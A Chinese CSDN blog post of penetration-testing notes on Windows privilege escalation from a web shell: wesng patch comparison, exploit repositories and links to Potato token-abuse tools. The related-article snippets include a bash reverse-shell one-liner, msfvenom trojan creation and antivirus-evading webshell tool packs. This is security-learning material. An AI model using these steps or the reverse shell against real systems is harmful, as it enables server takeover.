windows web提权

于 2024-05-29 12:02:19 发布
阅读量769 收藏 14
点赞数 35
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyw268/article/details/139285044
版权

#Web到Win-系统提权-人工操作

如果提权中无法执行命令的话,可以尝试上传cmd.exe到可读写目录再调用

优点:解决实时更新不集成的EXP

缺点:操作繁琐,需要各种复现调试

 

1、信息收集

参考常见命令(见上图)

2.补丁筛选

1.https://i.hacking8.com/tiquan 

在cmd输入systeminfo命令把得到的结果放到里面可以查询可利用的cve

2.https://github.com/bitsadmin/wesng

python wes.py systeminfo.txt 

把systeminfo的信息复制粘贴到一个文本 用这个工具跑可以获得可利用的cve

python wes.py systeminfo.txt  -i "Elevation of Privilege" -o 1.csv

在cve中挑选权限提升的 把结果生成在本地

3、EXP获取执行

KernelHub 针对常用溢出编号指定找EXP

Poc-in-Github 针对年份及编号指定找EXP

exploitdb 针对类型及关键说明指定找EXP 

像是msf的漏洞数据库可以搜漏洞 不仅仅是提权

https://github.com/Ascotbe/Kernelhub

https://github.com/nomi-sec/PoC-in-GitHub

https://gitlab.com/exploit-database/exploitdb

4.#Web到Win-系统提权-土豆家族

https://mp.weixin.qq.com/s/OW4ybuqtErh_ovkTWLSr8w   //关于土豆 

土豆(potato)提权通常用在我们获取WEB/数据库权限的时候,

可以将低权限的服务用户提升为“NT AUTHORITY\SYSTEM”特权。

1、Test in:Windows Server 2022 Datacenter(21H2)

GodPotato

https://github.com/BeichenDream/GodPotato

SweetPotato

https://github.com/CCob/SweetPotato

RoguePotato

https://github.com/antonioCoco/RoguePotato

BadPotato

https://github.com/BeichenDream/BadPotato

EfsPotato

https://github.com/zcgonvh/EfsPotato

MultiPotato

https://github.com/S3cur3Th1sSh1t/MultiPotato

CandyPotato

https://github.com/klezVirus/CandyPotato

RasmanPotato

https://github.com/crisprss/RasmanPotato

PetitPotato

https://github.com/wh0amitz/PetitPotato

JuicyPotatoNG

https://github.com/antonioCoco/JuicyPotatoNG

PrintNotifyPotato

https://github.com/BeichenDream/PrintNotifyPotato

CoercedPotato

https://github.com/Prepouce/CoercedPotato

爱敲键盘的pig
关注
windows系统提权
liweh的博客
07-18 306
1、内核溢出提权windows系统获取补丁: systeminfo或wmic qfe提权辅助工具: Windows-Exploit-Suggester(现在因为漏洞库不再更新,所以已经基本弃用systeminfo在windows系统上可以显示系统的各种信息主机名: WIN-AJC75HUE5HCOS 名称: Microsoft Windows Server 2008 R2 Standard。
Windows原理深入学习系列-Windows内核提权
SecSource_Stars的博客
03-15 544
这是[信安成长计划]的第 22 篇文章 0x00 目录 0x01 介绍 0x02 替换 Token 0x03 编辑 ACL 0x04 修改 Privileges 0x05 参考文章 继续纠正网上文章中那些奇怪的情况和问题 0x01 介绍 虽然主题是 Windows 内核提权,但实际上还是对之前文章的一个总结,这篇文章中所用到的东西全都是前几篇文章所提到的知识点,所有的操作都是之前文章中所讲述过的,以下所有的实验都是在 Win10_x64_20H2 上进行的。 0x02 替换 Token 主要原理就是将 Sy
webshll提权工具
12-02
webshll提权工具包 NC PR CMD Churrasco 工具全部已经免杀 无后门 webshll提权利器啊
WEB提权
forbidd3n,keep going
10-25 3466
本文转自《剑眉大侠提权笔记》,个人觉得思路想法很好,就转载了,其中蓝色字体为本人笔记 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 注:若net被禁用,可使用aio工具,可进行账户的克隆,该工具还有很多用户,请自行了解 2.当提权
web提权
qq_40495877的博客
04-29 2095
这里利用冰蝎远程连接到了靶机上: 利用systeminfo查看靶机系统的补丁; 如果有权限可以在靶机上创建txt文件保存,在用冰蝎下载下来,没有的话就复制粘贴到本地txt文件。 然后就利用本机下载的wesng去对比补丁库吧,命令如下: wesng目录下: python wes.py systeminfo.txt -o vuln.csv 对比结果保存为vuln.csv文件: 这里我们就有可利用的补丁漏洞了; 接下来用linux或者忍者系统去创建一个远程木马 命令行下: msfvenom -
权限提升第一天-简单Web权限提升&转移
最新发布
weixin_39953838的博客
12-26 521
你能提权成功,却提不了你在她心里的位置。
Guest权限提升方法总结
Another's story
07-31 2358
  现在的入侵是越来越难了,人们的安全意识都普遍提高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。) 但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员权限。比如我们通过某些对IIS的攻击,只
windows服务器安全设置之提权
09-30
web提权攻击中,攻击者常常利用Web应用的安全漏洞(比如SQL注入、跨站脚本攻击等)进入系统,然后提升权限。攻击者一旦获取了NETWORK SERVICE账号的权限,就可能进行各种恶意操作,包括但不限于安装恶意软件、修改...
权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1512
进程迁移注入提权就是将获取到权限低的进程注入至进程中权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的权限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
Windows常见的几种提权方法
热门推荐
hackzkaq的博客
05-20 1万+
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全—杰斯 提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限 在渗透测试过程中,拿到一个webshell之后,一般来说,我们的权限都是目标服务器中间件的权限。 这个时候就需要利用各种漏洞来提升自己的权限,从而能够获得对目标服务器的控制。 1.补丁查询法 简介 补丁一般都是为了应对计算机中存在的漏洞,为了更好的优化计算机的
webshell提权工具工具
11-26
web提权工具,一个好用的serv-u目录查看工具,哈哈哈哈哈哈哈哈
提权工具webshell
06-27
提权工具包,这套工具还没弄下来就放弃把,遗憾的就是不免杀
提权常用的工具集合(含CMD)
07-01
提权工具集合,包括FTP,SU,CMD,3389等工具
AI:web1提权
qq_39742838的博客
12-09 361
1.AI:web1前期端口扫描和sql注入不再提了,教程也有很多,直接说提权。 2.傻傻的上传了一个php文件,想要反弹shell,bash -i >& /dev/tcp/192.168.133.128/4444 0>&1,监听4444端口,访问这个php文件,结果并没有结果,一定是姿势不对。 3.监听4444端口 在kali os-shell执行 py...
web提权思路
09-11 193
1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:windowstempcookiesnet1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。 3.cmd拒绝...
web渗透--提权辅助工具Windows-Exploit-Suggester
朝阳似锦 晖映山河
09-23 502
辅助工具介绍 辅助工具Windows-Exploit-Suggester此工具将目标补丁与Microsoft漏洞数据库进行比较,以检测目标潜在的缺失补丁。 必须在python2环境中运行 python2 -m pip install xlrd python2 windows-exploit-suggester.py --update 得到2020-09-23-mssb.xls文件 python2 windows-exploit-suggester.py -h usage: windows-expl
15.CTF-web安全提权
woo233的博客
09-29 2099
往往我们能拿下服务器的web服务只是具有低权限用户(www-data),对于内网渗透,我们需要提权到root。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。提权前提:已经拿到低权shell被入侵的机器上面有nc,python,perl等linux非常常见的工具有权限上传文件和下载文件。
web 提权小结
学习总结
06-28 1656
ASP SHELL提权流程详解 文章作者 enterer 博客 www.enterer.cn 转载请保留 呵呵,本文应该是《asp webshell权限总结》的继续了吧。 文章导读: 本篇文章你可以看到1.本人提权经验与技巧 2.提权服务器的自己总结的流程 拿到webshell,确定了是什么权限的,那么提权就可以开始了。 1.首先是最简单的system权限下直接添加账号,和普通的CMD命令没有什么区别。这种机会还是很少的,基本我就遇到过2,3次。 此处提权失败进入2. 还有一个特别的,用asp代码来提权,不
WEB 安全之 SQL注入 < 三 > 提权
06-19 185
前两篇文章介绍了攻击者通过构造SQL语句来获得“非授权信息”,都是停留在数据库层面的,其实它的威力可不仅仅止于此吆。如果DB管理员有疏忽,再加上页面有注入漏洞,危害不仅仅像前两篇最终网站后台沦陷搞不好整个系统都有可能被人控制。     测试环境跟上一篇相同, MSQL + asp.net + win7。前面已经拿下了管理员用户名、密码,我们还是使用新闻详细页面 ( 方便测试,不设防 ...
Windows提权技术详解
本章提供了多个具体的提权案例,涵盖了各种环境和情况,如Web服务器的防护软件绕过、远程桌面服务的提权、数据库服务的利用等,展示了实战中如何实施提权。 每个案例都详细讲解了攻击者如何利用系统漏洞、配置错误...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值